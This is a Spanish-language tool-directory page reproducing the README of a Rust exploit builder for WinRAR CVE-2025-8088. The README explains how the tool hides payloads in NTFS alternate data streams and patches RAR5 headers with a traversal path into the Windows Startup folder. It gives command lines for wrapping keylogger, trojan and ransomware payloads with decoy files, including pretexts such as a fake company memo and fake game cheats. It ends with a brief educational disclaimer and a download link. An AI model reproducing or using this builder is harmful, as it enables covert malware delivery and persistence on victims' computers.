Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — Una implementación de alto rendimiento y segura en cuanto a memoria de la herramienta de explotación WinRAR CVE-2025-8088, reescrita en Rust para una mejor fiabilidad y rendimiento. | Kitploit
Herramientas/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
Mecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de PayloadsExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

Una implementación de alto rendimiento y segura en cuanto a memoria de la herramienta de explotación WinRAR CVE-2025-8088, reescrita en Rust para una mejor fiabilidad y rendimiento.

Ver Repositorio
836hace 1 añoAún no revisado
Compartir

WinRAR Exploit Tool - Rust Edition

Herramienta avanzada de explotación de Path Traversal en WinRAR - Escrita en Rust

Una implementación de alto rendimiento y segura en memoria de la herramienta de explotación WinRAR CVE-2025-8088, reescrita en Rust para mayor confiabilidad y rendimiento.

Características

  • Explotación de ADS - Flujos de datos alternativos NTFS para ocultar la carga útil
  • Manipulación de cabeceras RAR5 - Parcheo directo de cabeceras para inyección de rutas
  • Interfaz gráfica moderna - Interfaz basada en GTK con estilo CSS
  • Orientación al inicio - Colocación automática de la carga útil en el inicio de Windows
  • Soporte para señuelos personalizados - Use sus propios archivos señuelo o el predeterminado
  • Soporte universal de archivos - Admite cualquier tipo de archivo tanto para la carga útil como para el señuelo
  • Manejo robusto de errores - Verificación exhaustiva de errores y diagnóstico
  • Diagnóstico del sistema - Verificación automática de compatibilidad del sistema
  • Eficiencia de memoria - Bajo consumo de memoria con gestión inteligente de recursos

Requisitos

  • Rust 1.70+ - Cadena de herramientas Rust moderna
  • Bibliotecas de desarrollo GTK - Para soporte de interfaz gráfica
  • CLI de WinRAR - Para creación de archivos RAR
  • Windows 10/11 - Se requiere soporte NTFS

Inicio rápido

1. Instalar Rust

root@kitploit:~
# Instalar Rust usando rustup


# Verificar la instalación
rustc --version
cargo --version

2. Instalar bibliotecas de desarrollo GTK

Windows (MSVC)

root@kitploit:~
# Usando vcpkg
vcpkg install gtk:x64-windows

O usando MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. Clonar y compilar

root@kitploit:~
# Navegar al proyecto Rust
cd winrar_exploit_rust

# Compilar en modo debug
cargo build

# Compilar versión optimizada
cargo build --release

# Ejecutar la aplicación
cargo run --release

Uso

  1. Seleccionar carga útil - Elija cualquier archivo como carga útil (.exe, .bat, .jpg, .pdf, etc.)
  2. Elegir señuelo - Seleccione cualquier archivo como señuelo (se creará uno predeterminado si está vacío)
  3. Nombrar archivo - Introduzca el nombre del archivo RAR de salida
  4. Compilar - Generar el archivo de explotación

Ejemplos

Uso básico

Crear una explotación simple con una carga útil y un archivo señuelo:

root@kitploit:~
# Crear explotación con carga útil ejecutable
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Crear explotación con carga útil de script
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

Uso avanzado

Múltiples archivos señuelo

root@kitploit:~
# Usar varios archivos señuelo separados por comas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

Directorio de destino personalizado

root@kitploit:~
# Especificar directorio personalizado donde se colocará la carga útil
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

Diferentes tipos de carga útil

root@kitploit:~
# Carga útil de imagen (esteganografía)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# Carga útil PDF
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Carga útil de script batch
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

Diagnóstico del sistema

root@kitploit:~
# Ejecutar diagnóstico del sistema para verificar compatibilidad
.\winrar_exploit_rust.exe diagnose

# Mostrar herramientas y características disponibles
.\winrar_exploit_rust.exe tools

Escenarios del mundo real

Escenario 1: Entorno corporativo

root@kitploit:~
# Crear un documento malicioso que parezca un memo de la empresa
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

Escenario 2: Comunidad de juegos

root@kitploit:~
# Ocultar malware en un archivo de trucos de juego
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

La herramienta crea archivos RAR con path traversal utilizando:

  1. Creación de ADS - Oculta la carga útil en flujos de datos alternativos NTFS
  2. Construcción de RAR - Crea un RAR base con ADS usando la CLI de WinRAR
  3. Parcheo de cabeceras - Inyecta la ruta de traversal en las cabeceras RAR5
  4. Recálculo de CRC - Asegura la integridad del archivo
  5. Salida - Entrega el RAR malicioso listo para extracción

Ejemplo de ruta: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Tipos de archivo compatibles

Archivos de carga útil:

  • ✅ Ejecutables (.exe, .bat, .cmd)
  • ✅ Scripts (.py, .js, .vbs, .ps1)
  • ✅ Documentos (.pdf, .docx, .xlsx)
  • ✅ Imágenes (.jpg, .png, .gif)
  • ✅ Videos (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Cualquier tipo de archivo

Archivos señuelo:

  • ✅ Archivos de texto (.txt, .doc, .pdf)
  • ✅ Imágenes (.jpg, .png, .gif, .bmp)
  • ✅ Videos (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Documentos (.docx, .xlsx)
  • ✅ Cualquier tipo de archivo

Arquitectura

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Punto de entrada de la aplicación
│   ├── gui.rs           # Interfaz de usuario basada en GTK
│   ├── exploit.rs       # Lógica principal de explotación
│   ├── ads.rs           # Manipulación de ADS NTFS
│   ├── rar.rs           # Manipulación de cabeceras RAR5
│   ├── diagnostics.rs   # Diagnóstico del sistema
│   └── error.rs         # Manejo de errores
├── Cargo.toml           # Dependencias y configuración de compilación
└── README.md           # Este archivo

Solución de problemas

La herramienta incluye diagnósticos automáticos que verifican:

  • ✅ Instalación de CLI de WinRAR
  • ✅ Soporte de ADS NTFS
  • ✅ Permisos del directorio de inicio
  • ✅ Disponibilidad de bibliotecas GTK
  • ✅ Compatibilidad del sistema de archivos

Problemas comunes:

  1. "GTK no encontrado"

    root@kitploit:~
    # Instalar bibliotecas de desarrollo GTK
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # O usando MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "CLI de WinRAR no encontrado"

    • Instalar WinRAR desde https://www.winrar.com
    • Asegurarse de que rar.exe esté en Archivos de Programa
  3. "No se puede escribir en el directorio de inicio"

    • Ejecutar la herramienta como Administrador
    • Verificar los permisos de la carpeta
  4. "ADS NTFS no soportado"

    • Asegurarse de usar sistema de archivos NTFS
    • ADS no está soportado en FAT32/exFAT
  5. Errores de compilación

    root@kitploit:~
    # Actualizar la cadena de herramientas Rust
    rustup update
    
    # Limpiar y recompilar
    cargo clean
    cargo build --release
    

Formateo de código

root@kitploit:~
# Formatear código
cargo fmt

# Verificar código con linter
cargo clippy

Dependencias

Las dependencias clave incluyen:

  • gtk - Marco de trabajo moderno para GUI
  • tokio - Entorno de ejecución asíncrono
  • windows - Enlaces de API de Windows
  • crc32fast - Cálculo rápido de CRC32
  • byteorder - Manipulación de orden de bytes
  • anyhow - Manejo de errores

Consideraciones de seguridad

  • Propósito educativo: Esta herramienta es solo para pruebas autorizadas y fines educativos
  • Entorno controlado: Úsela solo en entornos controlados con el consentimiento adecuado
  • Cumplimiento legal: Asegúrese de cumplir con las leyes y regulaciones aplicables
  • Divulgación responsable: Siga las prácticas de divulgación responsable

Licencia

Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.

Autor

Creado por @kanonufo en Telegram


Herramienta de equipo rojo de alto rendimiento para la explotación de CVE-2025-8088 - Rust Edition

Descargar herramienta